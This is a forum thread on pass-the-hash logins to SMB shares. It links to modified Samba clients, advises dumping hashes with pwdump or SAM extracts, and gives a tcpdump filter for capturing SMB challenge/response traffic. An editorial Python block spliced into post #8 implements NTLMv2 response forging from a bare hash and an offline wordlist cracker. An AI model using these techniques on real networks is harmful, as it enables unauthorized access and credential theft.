Page 1 of 2
Results 1 to 10 of 16

Thread: Passing the hash for SMB shares

  1. #1
    Just burned his ISO
    Join Date
    Apr 2006
    Posts
    13

    Passing the hash for SMB shares

    Maybe you have heard about it, since there is a little hype about it right now.

    Here's a short description of what passing the hash is all about:
    When you normally log in to an SMB share you have to enter your username/password combination.
    But the good thing is, you do not have to know the password when you know the password hash. That means you can log in to any SMB share where you know the username/password hash combination.

    The main advantage is that Rainbow Tables for LM/NTLM hashes become redundant. You do not have to know the password.

    How does it work?
    To authenticate to an SMB share, the Samba client/Windows only uses the password hash, not the password, so all that has to be done is to use a modified SMB client which takes the password hash.

    In summary, all that is needed is a modified Samba client which uses username/password hash combinations instead of username/password combinations!
    A modified Samba client can be found here:
    foofus.net/jmk/passhash.html

    More information on LM/NTLM authentication can be found here:
    heise-security.co.uk/articles/75235

    A SMB proxy can be found here:
    cqure.net/wp/?page_id=11

    For Windows, the passwordhash is changed using dll injection:
    oss.coresecurity.com/projects/pshtoolkit.htm
    hexale.blogspot.com
    truesecurity.se/blogs/murray/default.asp

  2. #2
    Just burned his ISO
    Join Date
    Apr 2006
    Posts
    13


    I've recently tried it and it worked!
    I just patched the samba source with the patch available here:
    foofus.net/jmk/passhash.html

    So it should not be too much work to include this in the next version, but it would be a great new feature.

  3. #3
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629


    Cool will have to test this out sometime.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    Junior Member
    Join Date
    Apr 2006
    Posts
    33

    But how do you find the password hash?

    (I'm learning)

  5. #5
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629


    Sniff some network traffic, boot a system with a Linux CD and get a SAM extract, etc...

  6. #6
    Just burned his ISO
    Join Date
    Apr 2006
    Posts
    13


    Quote Originally Posted by thorin View Post
    Sniff some network traffic, boot a system with a Linux CD and get a SAM extract, etc...
    No, you cannot get the hash from network traffic. See heise-security.co.uk/articles/75235 for more details.

    The passing-the-hash technique becomes useful when the administrator of your LAN has the same account on every machine so that he can remotely administer these machines. You are sitting on one of these machines and run pwdump or something like that....

  7. #7
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629


    I only skimmed it, but I didn't see anything in that article that said you can't get it from network traffic, especially if the AD is maintaining lame NT4 compatibility and there are NT4 systems on the network. In fact the picture on the second page shows the l0pht (?) option "Retrieve by sniffing the local network - Sniffing captures encrypted hashes in transit over your network....."

  8. #8
    Just burned his ISO
    Join Date
    Apr 2006
    Posts
    13


    The relevant stuff for sniffing hashes in your LAN is on page three:
    heise-security.co.uk/articles/75235/2

    A Windows machine never sends the hash itself across the LAN, even with LM hashes. The server sends a challenge to the client and the client encrypts the challenge with parts of the hash.

    But it's possible to crack a password using the data being sent across the LAN. This is possible because the challenge is sent unencrypted. The attacker encrypts the challenge with hashes (generated from passwords in a wordlist) and checks whether the encrypted challenge matches the one the server accepted. With this attack you get the hash, but you don't need it anymore, since you then know the password.
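The two protocol points made in this thread, that a client holding only the hash can complete the SMB logon (post #1) and that a sniffed exchange gives you a wordlist attack but never the hash itself, because the challenge crosses the wire in the clear (post #8), as an added example in Python. This code is not part of the thread or of any of the tools linked above. It models the NTLMv2 exchange (HMAC-MD5 keyed with the NT hash, as specified in MS-NLMP) rather than the DES-based LM/NTLMv1 response the posts describe, because HMAC-MD5 is in the Python standard library; the principle is identical. MD4 is implemented inline because hashlib builds on OpenSSL 3 often lack it. The user name, domain, server challenge, client blob and wordlist are constructed sample values, not captured data.

```python
"""Added example (not from the thread): pass-the-hash and offline cracking of a
sniffed NTLM challenge/response, modelled on NTLMv2 (MS-NLMP) with stdlib only."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 over the UTF-16LE password."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    k2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    k3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1, F = (b & c) | (~b & d)
            a = _rotl((a + ((b & c) | (~b & d)) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, G = majority(b, c, d)
            a = _rotl((a + ((b & c) | (b & d) | (c & d)) + x[k2[i]] + 0x5A827999) & MASK,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3, H = b ^ c ^ d
            a = _rotl((a + (b ^ c ^ d) + x[k3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password):
    """What pwdump / a SAM extract gives you: MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt, user, domain):
    """NTLMv2 key: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt, user, domain, server_challenge, client_blob):
    """What the client sends back. Note the inputs: hash, challenge, blob.
    The password itself is never needed, which is exactly what pass-the-hash exploits."""
    proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + client_blob,
                     hashlib.md5).digest()
    return proof + client_blob


def crack_captured_response(user, domain, server_challenge, captured, wordlist):
    """Offline attack on a sniffed exchange (the challenge went over the wire in
    the clear): hash each candidate, recompute the response, compare. The hash
    is never read off the wire; it is only confirmed once the password is guessed."""
    blob = captured[16:]  # NTProofStr is 16 bytes, the blob follows it
    for candidate in wordlist:
        if ntlmv2_response(nt_hash(candidate), user, domain, server_challenge, blob) == captured:
            return candidate
    return None


# Constructed sample values (assumptions, not captured traffic).
USER, DOMAIN = "admin", "LAB"
CHALLENGE = bytes.fromhex("0123456789abcdef")
BLOB = bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("a1b2c3d4e5f60718") + bytes(4)
KNOWN_NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")  # NT hash of "password"


def demo():
    """Returns (pass-the-hash response matches a real logon, cracked password)."""
    legit = ntlmv2_response(nt_hash("password"), USER, DOMAIN, CHALLENGE, BLOB)
    # A modified client that was only ever given the hash produces the same bytes.
    pth = ntlmv2_response(KNOWN_NT_HASH, USER, DOMAIN, CHALLENGE, BLOB)
    cracked = crack_captured_response(USER, DOMAIN, CHALLENGE, legit,
                                      ["letmein", "Password1", "password"])
    return legit == pth, cracked


if __name__ == "__main__":
    print(demo())
```

Running it shows that the response computed from the bare NT hash is byte for byte the one a client with the real password would send, which is all a modified Samba client needs, and that the cracker recovers the password from the capture only by guessing it from the wordlist; with a strong password outside the list it returns nothing, and at no point does the hash appear in what was sniffed.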

  9. #9
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Quote Originally Posted by hattrick View Post
    But how do you find the password hash?

    (I'm learning)
    A book I read a little while back explained it well:

    Sniff the traffic on ports 139 and/or 445. The challenge is 0x72 and the response is 0x73 at byte 28.

    tcpdump -nes 0 -w <file> 'tcp[28]=0x72 or tcp[28]=0x73 or tcp[40]=0x72 or tcp[40]=0x73'
    dd if=/dev/swc666 of=/dev/wyze

  10. #10
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629
